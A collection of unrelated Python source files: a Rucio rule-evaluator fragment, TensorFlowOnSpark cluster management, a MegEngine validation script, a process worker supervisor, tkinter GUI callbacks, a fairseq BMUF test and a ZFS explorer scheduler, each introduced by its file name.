paused_dids[(did.scope, did.name)] = datetime.utcnow() + timedelta(seconds=randint(60, 600))
logging.warning('re_evaluator[%s/%s]: Locks detected for %s:%s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
record_counter('rule.judge.exceptions.LocksDetected')
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except ReplicationRuleCreationTemporaryFailed as e:
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
logging.warning('re_evaluator[%s/%s]: Replica Creation temporary failed, retrying later for %s:%s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
except FlushError as e:
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
logging.warning('re_evaluator[%s/%s]: Flush error for %s:%s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, did.scope, did.name))
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable='rucio-judge-evaluator', hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Eval threads.
"""
hostname = socket.gethostname()
sanity_check(executable='rucio-judge-evaluator', hostname=hostname)
if once:
re_evaluator(once)
else:
logging.info('Evaluator starting %s threads' % str(threads))
threads = [threading.Thread(target=re_evaluator, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
TFCluster.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None #: SparkContext
defaultFS = None #: Default FileSystem string, e.g. ``file://`` or ``hdfs://<namenode>/``
working_dir = None #: Current working directory
num_executors = None #: Number of executors in the Spark job (and therefore, the number of nodes in the TensorFlow cluster).
nodeRDD = None #: RDD representing the nodes of the cluster, i.e. ``sc.parallelize(range(num_executors), num_executors)``
cluster_id = None #: Unique ID for this cluster, used to invalidate state for new clusters.
cluster_info = None #: Cluster node reservations
cluster_meta = None #: Cluster metadata dictionary, e.g. cluster_id, defaultFS, reservation.Server address, etc.
input_mode = None #: TFCluster.InputMode for this cluster
queues = None #: *INTERNAL_USE*
server = None #: reservation.Server for this cluster
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = []
for i in range(num_epochs):
rdds.append(dataRDD)
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
if node['job_name'] == 'ps':
ps_list.append(node)
else:
worker_list.append(node)
if ssc is not None:
# Spark Streaming
done = False
while not done:
done = ssc.awaitTerminationOrTimeout(1)
if not done and self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
done = done or self.server.done
else:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
if self.input_mode == InputMode.TENSORFLOW:
count = 0
done = False
while not done:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) > 0:
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
done = (count >= 3)
time.sleep(5)
else:
done = True
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
done = False
while not done:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""Utility function to get the Tensorboard URL"""
tb_url = None
for node in self.cluster_info:
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
return tb_url
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
:driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this help maximizing computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tensorboard else ""))
assert num_ps < num_executors
if driver_ps_nodes and input_mode != InputMode.TENSORFLOW:
raise Exception('running PS nodes on driver locally is only supported in InputMode.TENSORFLOW')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
cluster_template['worker'] = range(num_ps, num_executors)
logging.info("worker node range %s, ps node range %s" % (cluster_template['worker'], cluster_template['ps']))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
if driver_ps_nodes:
nodeRDD = sc.parallelize(range(num_ps, num_executors), num_executors - num_ps)
else:
nodeRDD = sc.parallelize(range(num_executors), num_executors)
if driver_ps_nodes:
def _start_ps(node_index):
logging.info("starting ps node locally %d" % node_index)
TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK))([node_index])
for i in cluster_template['ps']:
ps_thread = threading.Thread(target=lambda: _start_ps(i))
ps_thread.daemon = True
ps_thread.start()
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tensorboard,
log_dir,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, ppid), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'],node['ppid'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, ppid={1}). Please ensure that (1) the number of executors >= number of TensorFlow nodes, (2) the number of tasks per executors == 1, and (3) TFCluster.shutdown() is successfully invoked when done.".format(node_id[0], node_id[1]))
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
test.py | # -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2020 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import argparse
import multiprocessing as mp
import time
import megengine as mge
import megengine.data as data
import megengine.data.transform as T
import megengine.distributed as dist
import megengine.functional as F
import megengine.jit as jit
import model as M
logger = mge.get_logger(__name__)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--arch", default="shufflenet_v2_x1_0", type=str)
parser.add_argument("-d", "--data", default=None, type=str)
parser.add_argument("-m", "--model", default=None, type=str)
parser.add_argument("-n", "--ngpus", default=None, type=int)
parser.add_argument("-w", "--workers", default=4, type=int)
parser.add_argument("--report-freq", default=50, type=int)
args = parser.parse_args()
world_size = mge.get_device_count("gpu") if args.ngpus is None else args.ngpus
if world_size > 1:
# start distributed training, dispatch sub-processes
mp.set_start_method("spawn")
processes = []
for rank in range(world_size):
p = mp.Process(target=worker, args=(rank, world_size, args))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
worker(0, 1, args)
def worker(rank, world_size, args):
if world_size > 1:
# Initialize distributed process group
logger.info("init distributed process group {} / {}".format(rank, world_size))
dist.init_process_group(
master_ip="localhost",
master_port=23456,
world_size=world_size,
rank=rank,
dev=rank,
)
model = getattr(M, args.arch)(pretrained=(args.model is None))
if args.model:
logger.info("load weights from %s", args.model)
model.load_state_dict(mge.load(args.model))
@jit.trace(symbolic=True)
def valid_func(image, label):
model.eval()
logits = model(image)
loss = F.cross_entropy_with_softmax(logits, label)
acc1, acc5 = F.accuracy(logits, label, (1, 5))
if dist.is_distributed(): # all_reduce_mean
loss = dist.all_reduce_sum(loss, "valid_loss") / dist.get_world_size()
acc1 = dist.all_reduce_sum(acc1, "valid_acc1") / dist.get_world_size()
acc5 = dist.all_reduce_sum(acc5, "valid_acc5") / dist.get_world_size()
return loss, acc1, acc5
logger.info("preparing dataset..")
valid_dataset = data.dataset.ImageNet(args.data, train=False)
valid_sampler = data.SequentialSampler(
valid_dataset, batch_size=100, drop_last=False
)
valid_queue = data.DataLoader(
valid_dataset,
sampler=valid_sampler,
transform=T.Compose(
[
T.Resize(256),
T.CenterCrop(224),
T.Normalize(
mean=[103.530, 116.280, 123.675], std=[57.375, 57.120, 58.395]
), # BGR
T.ToMode("CHW"),
]
),
num_workers=args.workers,
)
_, valid_acc, valid_acc5 = infer(valid_func, valid_queue, args)
logger.info("Valid %.3f / %.3f", valid_acc, valid_acc5)
def infer(model, data_queue, args, epoch=0):
objs = AverageMeter("Loss")
top1 = AverageMeter("Acc@1")
top5 = AverageMeter("Acc@5")
total_time = AverageMeter("Time")
t = time.time()
for step, (image, label) in enumerate(data_queue):
n = image.shape[0]
image = image.astype("float32") # convert np.uint8 to float32
label = label.astype("int32")
loss, acc1, acc5 = model(image, label)
objs.update(loss.numpy()[0], n)
top1.update(100 * acc1.numpy()[0], n)
top5.update(100 * acc5.numpy()[0], n)
total_time.update(time.time() - t)
t = time.time()
if step % args.report_freq == 0 and dist.get_rank() == 0:
logger.info(
"Epoch %d Step %d, %s %s %s %s",
epoch,
step,
objs,
top1,
top5,
total_time,
)
return objs.avg, top1.avg, top5.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=":.3f"):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = "{name} {val" + self.fmt + "} ({avg" + self.fmt + "})"
return fmtstr.format(**self.__dict__)
if __name__ == "__main__":
main()
|
worker.py | import logging
from datetime import timedelta, datetime
from importlib import import_module
from logging import getLogger
from pickle import loads
import os
import signal
from multiprocessing import Process
from time import sleep
import sys
logger = getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
logger.addHandler(ch)
def enough_time(start_time, timeout):
return (timeout is None) or (start_time + timedelta(seconds=timeout) > datetime.now())
class WorkerSupervisor(object):
def __init__(self, workers_num, broker_path, application_path, stop_timeout=30):
broker_modulepath, broker_classname = broker_path.rsplit('.', 1)
broker_module = import_module(broker_modulepath)
broker_cls = getattr(broker_module, broker_classname)
self.stop_timeout = stop_timeout
self.broker_cls = broker_cls
self.broker = None
self.application_path = application_path
self.workers_num = workers_num
self.workers_processes = []
def receive_hup_signal(self, signum, stack):
logger.info(u'Worker supervisor received HUP signal')
self.gracefully_stop_workers()
def receive_term_signal(self, signum, stack):
logger.info(u'Worker supervisor received TERM signal')
self.gracefully_stop_workers()
sys.exit(0)
def receive_int_signal(self, signum, stack):
self.gracefully_stop_workers(timeout=self.stop_timeout)
if not self.workers_processes:
sys.exit(0)
self.stop_workers()
sys.exit(1)
def receive_quit_signal(self, signum, stack):
self.stop_workers()
sys.exit(2)
def gracefully_stop_workers(self, timeout=None):
start_time = datetime.now()
for worker, process in self.workers_processes:
process.terminate()
while self.workers_processes and enough_time(start_time, timeout):
self.check_workers()
def stop_workers(self):
for worker, process in self.workers_processes:
if process.is_alive():
process.kill()
self.check_workers()
def check_workers(self):
for worker, process in self.workers_processes:
if process.is_alive():
self.broker.check_worker(process.pid)
else:
self.broker.terminate_worker(process.pid)
logger.debug("Worker process terminated: id={}".format(process.pid))
self.workers_processes.remove((worker, process))
def start(self):
signal.signal(signal.SIGHUP, self.receive_hup_signal)
signal.signal(signal.SIGTERM, self.receive_term_signal)
signal.signal(signal.SIGINT, self.receive_int_signal)
signal.signal(signal.SIGQUIT, self.receive_quit_signal)
logger.debug("Worker supervisor started: application={self.application_path} broker_class={self.broker_cls}".format(self=self))
self.broker = self.broker_cls()
while True:
workers_processes_fill = self.workers_num - len(self.workers_processes)
for i in range(workers_processes_fill):
worker = Worker(broker=self.broker, application_path=self.application_path)
process = Process(target=worker.start)
process.start()
logger.debug("Worker process started: id={process.pid}".format(process=process))
self.workers_processes.append((worker, process))
self.check_workers()
sleep(0.5)
class Worker(object):
def __init__(self, broker, application_path=None):
self.application_path = application_path
self.running = True
self.broker = broker
self.id = None
def run_task(self, task, task_args, task_kwargs):
logger.debug('Worker run task {} {} {}'.format(task, task_args, task_kwargs))
try:
return task(*task_args, **task_kwargs)
except Exception as exception:
return exception
def receive_hup_or_term_signal(self, signum, stack):
logger.info(u'Worker {} received signal: {}'.format(self.id, signum))
self.running = False
def receive_int_or_quit_signal(self, signum, stack):
logger.info(u'Worker {} received signal: {}'.format(self.id, signum))
sys.exit(1)
def start(self):
signal.signal(signal.SIGHUP, self.receive_hup_or_term_signal)
signal.signal(signal.SIGTERM, self.receive_hup_or_term_signal)
signal.signal(signal.SIGINT, self.receive_int_or_quit_signal)
signal.signal(signal.SIGQUIT, self.receive_int_or_quit_signal)
self.id = os.getpid()
logger.debug("Worker started: id={self.id} application={self.application_path} broker_class={self.broker.__class__.__name__}".format(self=self))
import_module(self.application_path)
while self.running:
task_pack = self.broker.pull_task(self.id)
if not task_pack:
sleep(0.1)
continue
task, task_args, task_kwargs = loads(task_pack)
task_result = self.run_task(task, task_args, task_kwargs)
self.broker.finish_task(self.id)
logger.debug('task_result {}'.format(task_result))
|
Callbacks_Refactored.py | '''
Created on Jun 9, 2019
Ch08
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from time import sleep
from threading import Thread
from pytz import all_timezones, timezone
from datetime import datetime
class Callbacks():
def __init__(self, oop):
self.oop = oop
def defaultFileEntries(self):
self.oop.fileEntry.delete(0, tk.END)
self.oop.fileEntry.insert(0, 'Z:\\') # bogus path
self.oop.fileEntry.config(state='readonly')
self.oop.netwEntry.delete(0, tk.END)
self.oop.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.oop.combo.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.oop.spin.get()
self.oop.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.oop.chVarUn.get(): self.oop.check3.configure(state='disabled')
else: self.oop.check3.configure(state='normal')
if self.oop.chVarEn.get(): self.oop.check2.configure(state='disabled')
else: self.oop.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.oop.radVar.get()
if radSel == 0: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[0])
elif radSel == 1: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[1])
elif radSel == 2: self.oop.widgetFrame.configure(text=self.oop.i18n.WIDGET_LABEL + self.oop.i18n.colorsIn[2])
# Exit GUI cleanly
def _quit(self):
self.oop.win.quit()
self.oop.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.oop.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
print('methodInAThread():', self.oop.runT.isAlive())
# Running methods in Threads
def createThread(self, num):
self.oop.runT = Thread(target=self.oop.methodInAThread, args=[num])
self.oop.runT.setDaemon(True)
self.oop.runT.start()
print(self.oop.runT)
print('createThread():', self.oop.runT.isAlive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.oop.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.oop.guiQueue.get()
print(qItem)
self.oop.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.oop.bookTitle.get()
page = self.oop.pageNumber.get()
quote = self.oop.quote.get(1.0, tk.END)
print(title)
print(quote)
self.oop.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.oop.mySQL.showBooks()
print(allBooks)
self.oop.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
# TZ Button callback
def allTimeZones(self):
for tz in all_timezones:
self.oop.scr.insert(tk.INSERT, tz + '\n')
# TZ Local Button callback
def localZone(self):
from tzlocal import get_localzone
self.oop.scr.delete('1.0', tk.END)
self.oop.scr.insert(tk.INSERT, get_localzone())
# Format local US time with TimeZone info
def getDateTime(self):
fmtStrZone = "%Y-%m-%d %H:%M:%S %Z%z"
# Get Coordinated Universal Time
utc = datetime.now(timezone('UTC'))
self.oop.log.writeToLog(utc.strftime(fmtStrZone),
self.oop.level.MINIMUM)
# Convert UTC datetime object to Los Angeles TimeZone
la = utc.astimezone(timezone('America/Los_Angeles'))
self.oop.log.writeToLog(la.strftime(fmtStrZone),
self.oop.level.NORMAL)
# Convert UTC datetime object to New York TimeZone
ny = utc.astimezone(timezone('America/New_York'))
self.oop.log.writeToLog(ny.strftime(fmtStrZone),
self.oop.level.DEBUG)
# update GUI label with NY Time and Zone
self.oop.lbl2.set(ny.strftime(fmtStrZone))
|
test_bmuf.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from multiprocessing import Manager
import random
import unittest
import torch
import torch.nn as nn
from fairseq import distributed_utils, optim
class Model(nn.Module):
def __init__(self, input_size, output_size):
super(Model, self).__init__()
self.fc = nn.Linear(input_size, output_size)
def forward(self, input):
output = self.fc(input)
return output
def setup_model_loss_criterion(args, rank, is_cuda):
"""
setup model, criterion and optimizer based on input args
"""
args.distributed_rank = rank
distributed_utils.distributed_init(args)
torch.manual_seed(1)
model = Model(args.input_size, args.nb_classes)
loss_fn = nn.CrossEntropyLoss()
if is_cuda:
model = model.cuda()
loss_fn = loss_fn.cuda()
optimizer = optim.sgd.SGD(args, model.parameters())
optimizer = optim.FairseqBMUF(args, optimizer)
return model, loss_fn, optimizer
def train_step(input, target, model, loss_fn, optimizer):
"""Do forward, backward and parameter update."""
model.train()
output = model(input)
loss = loss_fn(output, target)
optimizer.backward(loss)
optimizer.step()
def single_gpu_training(args, rank, iterations, shared_results):
is_cuda = torch.cuda.is_available()
if is_cuda:
torch.cuda.set_device(rank)
model, loss_fn, optimizer = setup_model_loss_criterion(args, rank, is_cuda)
for _ in range(iterations):
input = torch.randn(1, args.input_size)
target = torch.empty(args.batch_size, dtype=torch.long).random_(args.nb_classes)
if is_cuda:
input = input.cuda()
target = target.cuda()
train_step(input, target, model, loss_fn, optimizer)
results = []
for param in model.parameters():
if len(results) == 0:
results = param.flatten().cpu().data
else:
results = torch.cat((results, param.flatten().cpu().data), 0)
shared_results[rank] = results
def setup_args():
args = argparse.Namespace()
args.global_sync_iter = 20
args.block_momentum = 0.875
args.block_lr = 0.5
args.input_size = 5
args.nb_classes = 2
args.batch_size = 1
args.lr = [1e-3]
args.momentum = 0
args.weight_decay = 0
args.warmup_iterations = 0
args.use_nbm = True
args.average_sync = True
args.global_sync_iter = 1
args.distributed_backend = "gloo"
args.distributed_world_size = 2
port = random.randint(10000, 20000)
args.distributed_init_method = "tcp://localhost:{port}".format(port=port)
args.distributed_init_host = "localhost"
args.distributed_port = port + 1
args.local_world_size = args.distributed_world_size
return args
@unittest.skipIf(torch.cuda.device_count() < 2, "test requires 2 GPUs")
class TestBMUF(unittest.TestCase):
def bmuf_process(self, args, iterations):
processes = []
results = Manager().dict()
ctx = torch.multiprocessing.get_context("spawn")
for rank in range(args.distributed_world_size):
p = ctx.Process(
target=single_gpu_training, args=(args, rank, iterations, results)
)
p.start()
processes.append(p)
for p in processes:
p.join()
# Make sure params in both machines are same
assert len(results) == 2
self.assertAlmostEqual(results[0], results[1])
def test_bmuf_sync(self):
# Train model for 1 iteration and do bmuf sync without doing warmup
args = setup_args()
iterations = 1
self.bmuf_process(args, iterations)
def test_warmup_sync(self):
# Train model for 20 iteration and do warmup sync without doing bmuf sync
args = setup_args()
args.warmup_iterations = 20
iterations = 20
self.bmuf_process(args, iterations)
def test_warmup_sync_bmuf_sync(self):
# Train model for 25 iteration and do warmup sync after 20 iteration
# and bmuf sync after 25 iteration
args = setup_args()
args.warmup_iterations = 20
args.global_sync_iter = 5
iterations = 25
self.bmuf_process(args, iterations)
def assertAlmostEqual(self, t1, t2):
self.assertEqual(t1.size(), t2.size(), "size mismatch")
self.assertLess((t1 - t2).abs().max(), 1e-4)
if __name__ == '__main__':
unittest.main()
|
explorer_scheduler.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Aldo Sotolongo
# Contact: aldenso@gmail.com
# Description: Schedule automatic explorer of ZFS Storage Appliance.
from __future__ import print_function
import os
from datetime import datetime
import argparse
import time
import threading
import schedule
import inotify.adapters
import zfssa_explorer
def create_parser():
"""Get Arguments"""
parser = argparse.ArgumentParser(
description="Schedule zfssa explorers")
parser.add_argument("-d", "--directory", type=str,
help="Directory to find Server config files (YAML)",
required=True)
parser.add_argument("-t", "--time", nargs='+',
help="24Hr time where the Job should be launched",
required=True)
return parser
def get_zfssalist(directory):
"""Return list of yml files in current directory"""
files = [file for file in os.listdir(directory) if file.endswith('yml')]
if not files:
print('No yaml found in {}'.format(directory))
exit(1)
zfssalist = [os.path.join(directory, file) for file in files]
return zfssalist
def launch_explorers(zfssalist):
"""Launch explorers from a zfsssa list"""
for zfssa in zfssalist:
argsforexplorer = Namespace(server=zfssa, progress=True)
print("Explorer for '{}' launched".format(zfssa.split('.')[0]))
zfssa_explorer.main(argsforexplorer)
class Namespace:
"""Class to simulate args parsed"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
class ThreadingInotify(object):
""" Threading inotify"""
def __init__(self, directory, interval=1):
self.directory = directory
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
""" Method that runs forever """
while True:
i = inotify.adapters.Inotify()
i.add_watch(self.directory)
for event in i.event_gen(yield_nones=False):
(_, etype, _, _) = event
if 'IN_DELETE' in etype or 'IN_MODIFY' in etype or 'IN_MOVED_TO' in \
etype or 'IN_MOVED_FROM' in etype or 'IN_CREATE' in etype:
schedule.clear()
print("---- Removed previous schedules ----")
zfssanewlist = get_zfssalist(self.directory)
for stime in args.time:
for zfs in zfssanewlist:
print("++++ Scheduled: {} {} ++++".format(stime, zfs))
schedule.every().day.at(stime).do(launch_explorers, zfssalist)
time.sleep(self.interval)
if __name__ == "__main__":
print("Started at: {}".format(datetime.now()))
parser = create_parser()
args = parser.parse_args()
zfssalist = get_zfssalist(args.directory)
for schedtime in args.time:
schedule.every().day.at(schedtime).do(launch_explorers, zfssalist)
for zfssa in zfssalist:
print("++++ Scheduled: {} {} ++++".format(schedtime, zfssa))
ThreadingInotify(args.directory)
while True:
schedule.run_pending()
time.sleep(1)
|
main_parallel.py | #!/usr/bin/env python3
import os, sys
os.environ["MKL_NUM_THREADS"] = "1"
import numpy as np
from math import pi, sqrt, exp
from scipy.sparse import csr_matrix as csr
from scipy import linalg
import random
import torch
import time
from termcolor import colored
import copy
if __name__ == '__main__':
from math import *
import torch.multiprocessing as mp
